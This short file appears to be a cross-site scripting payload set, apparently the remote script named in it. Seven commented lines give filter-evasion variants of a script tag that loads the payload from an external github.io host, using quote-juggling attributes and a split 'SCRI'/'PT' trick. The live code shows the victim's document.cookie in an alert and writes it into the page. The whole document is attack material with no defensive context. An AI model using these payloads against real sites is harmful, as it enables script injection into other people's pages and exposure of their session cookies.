//<SCRIPT "a='>'" SRC="http://saltnvinegar.github.io/REMOTE-XSS-ATTACK/XSS_UPPER.JS"></SCRIPT>
//<SCRIPT a=">" '' SRC="http://saltnvinegar.github.io/REMOTE-XSS-ATTACK/XSS_UPPER.JS"></SCRIPT>
//<SCRIPT =">" SRC="http://saltnvinegar.github.io/REMOTE-XSS-ATTACK/XSS_UPPER.JS"></SCRIPT>
//<SCRIPT a=">" SRC="http://saltnvinegar.github.io/REMOTE-XSS-ATTACK/XSS_UPPER.JS"></SCRIPT>
//<SCRIPT a=`>` SRC="http://saltnvinegar.github.io/REMOTE-XSS-ATTACK/XSS_UPPER.JS"></SCRIPT>
//<SCRIPT a=">'>" SRC="http://saltnvinegar.github.io/REMOTE-XSS-ATTACK/XSS_UPPER.JS"></SCRIPT>
//<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://saltnvinegar.github.io/REMOTE-XSS-ATTACK/XSS_UPPER.JS"></SCRIPT>
alert ("Bro, do you even XSS? " + document.cookie);
document.write ("I'm in ur interwebz, attacking ur app " + document.cookie);
